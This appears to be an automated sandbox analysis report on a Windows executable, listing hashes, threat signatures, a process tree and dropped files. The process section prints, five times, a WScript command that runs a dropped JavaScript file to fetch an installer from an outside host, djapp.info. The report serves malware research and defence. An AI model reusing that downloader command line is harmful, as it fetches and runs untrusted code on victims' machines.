Analysis

  • max time kernel
    132s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    07/09/2024, 06:36

General

  • Target

    d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    d14c74193f0d7c558c59ebc5cc43d9c1

  • SHA1

    24495e1d4d9db3054b84f0e1fe8fc41b530ac2e8

  • SHA256

    810f62f62724ecc9d32fe2a3836cd35b0f6004fbd0f5b1c5633c264b1a5d1f43

  • SHA512

    09cabf9785b55aaed7c79d8a3bbf03ca0418a45aaeddf014891d7be6809e5c7cdea913cd48d4ecd1440e7acd1a1706c3de2b39771b0bbb0361ee3dab7318a950

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Y:/7BSH8zUB+nGESaaRvoB7FJNndnF

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 13 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAD11.js" http://www.djapp.info/?domain=zXbNFoNZhU.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAD11.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:2136
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAD11.js" http://www.djapp.info/?domain=zXbNFoNZhU.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAD11.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:2204
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAD11.js" http://www.djapp.info/?domain=zXbNFoNZhU.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAD11.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:892
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAD11.js" http://www.djapp.info/?domain=zXbNFoNZhU.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAD11.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:2940
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAD11.js" http://www.djapp.info/?domain=zXbNFoNZhU.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAD11.exe
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      PID:2264

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    7fb5fa1534dcf77f2125b2403b30a0ee

    SHA1

    365d96812a69ac0a4611ea4b70a3f306576cc3ea

    SHA256

    33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

    SHA512

    a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    4693b6d22b04983e7973afd9e91153ef

    SHA1

    f5cc1315c09a51554becfb89dad4eabad85b35d5

    SHA256

    e2a2c4df0441b28d538c3e0b7c96c5a9a792a1d44c02c3b35ab274c0288bc5c3

    SHA512

    c3e230f43d4ca7118562c0bd9f74beacbbe94c9d4a37aefab5363c5389ee3420a8f7e0c7537cf60a9d792770295958a287ca6811ed12469a1773131794176c9e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    fab7620e279c630e8bb2a476b2808e77

    SHA1

    9d338a54b6f635f5d683ca3abc62e21522f58696

    SHA256

    89cf059cca36062dd1682a2859bd094d719d0195cea3f6132a232da403f41fc1

    SHA512

    e3534cd8f05aba1146a590d43b213d06eb03f7c8b3e58bb5b4c2e17c8f9131bae7aabdd08977bfb5d0ad4b56fbb25d0be13c75cdf94d438ca517b4a90671baad

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    289abcf8224b44eaea906e41a459d976

    SHA1

    63beaa54cc181d915833c862c105a44668aeb5e6

    SHA256

    75217dd506fe4ea9658acddd73c0db9c9827754c57412db15c321cd1e06d1167

    SHA512

    62a88351dfc87a23e3849f63c5b7ac06bcf78590711b9aae4289d0d948acd183c1ea7f550a8654e19d2daacf570cde770a54dc9b95716ac069b5e25a2a1363af

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    242B

    MD5

    d68e23b37a527bed8494aaa2e767ebd4

    SHA1

    97699c236805286b8485f889da91be89a3e98647

    SHA256

    fe615a8c04217a639ce221f313f7fa97084b4a3b53a238881eb80edfb9c1d8fc

    SHA512

    494aa41f7904dd1dcc6543ea722190d06b466ab66c26b17e2c3d04928154eaed5462f5903bfa3a3f55ecd0bcfd25f971de9a780144afebb1cf9457af5b35ebcc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\domain_profile[1].htm

    Filesize

    6KB

    MD5

    fd41ee289936347c3be793e88b2ac69c

    SHA1

    23112b144ce4db4487413e03443389fbd2547df7

    SHA256

    484506d6bee5d0d90a6a8bd2cd8f74cc011841ef531322b89383d4b39de98245

    SHA512

    6e6f0b095b143a7a4235df945ab71426d8f96a36964bb0dc412ec756d2e2ea0a03a3b969a4913fd7454c73128ba234bbcbb7ddb4f2779b0d459be8feb01a4e11

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\domain_profile[1].htm

    Filesize

    40KB

    MD5

    530d4cb46e29f2dbe35cfbe37b28f783

    SHA1

    1e7ae136dcad314deaadc997639bc61cf5dbacf2

    SHA256

    056cc137a1ff48cb7c634eea32091f384dcf9432c6754d7c8268ac02c288e5f2

    SHA512

    3d6cb4f23de4c2b3ce728509c76071bdb93013a90d5f29692a5b642efa032a7adcde415742ffb1bd25bbcbb975931cae241ca3a5287ce9b1ecb59b712751755b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OX8Z8GR5\domain_profile[1].htm

    Filesize

    6KB

    MD5

    aa6d1bbf0fde51d4c8f89f44301256a1

    SHA1

    b12a163cb6d19411d635be8e0362e787e407d3c1

    SHA256

    feb5c209e09f80effd3611d68878ea6d800dccf174c0e6be93ea0a3b95918e14

    SHA512

    2fc135f196d09a63f20332a48b2b008b47d43c4804d5cd462a33f8a8fe6fb362a56b83f380cb3a282e54f6b4ee1fb7538777d70f15914af011cdbe83779464c4

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OX8Z8GR5\domain_profile[1].htm

    Filesize

    40KB

    MD5

    ec3f9d796906cbbea26434d46a9b175d

    SHA1

    b7cbb73d155840f9778aa10d61d1cb1c4fa11b77

    SHA256

    1cc202beca2905e281721cbd761512bb81a6d3c64ee1e116a93d8232876f8907

    SHA512

    2b60d30e4192920edd3374572cf8793f25c2175bd9538d3cbb4682f3a236c6bb9a51eee5a0cd9fd57a7d1e03e58964f50e36e5b354ebac18465b8e39b57ee3f3

  • C:\Users\Admin\AppData\Local\Temp\Cab7723.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarB09B.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\fufAD11.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\8JS55G96.txt

    Filesize

    175B

    MD5

    897e592c9f945449a80f2511ddd57e2e

    SHA1

    695333c5812551e507f677bfaa8eea2e0541bde8

    SHA256

    8b54b569e9b21ff77b4b6066be772e8d15898203fa0eeec5810da866d615020f

    SHA512

    9435dcbaa40cb13852312135ef77ffe0f8ce0ab5c9c831e534913d978b65ba7c2ca24a4f0056aad5df851f995211fe26942660bd2a4dc8a488e6b3b5cae5ef64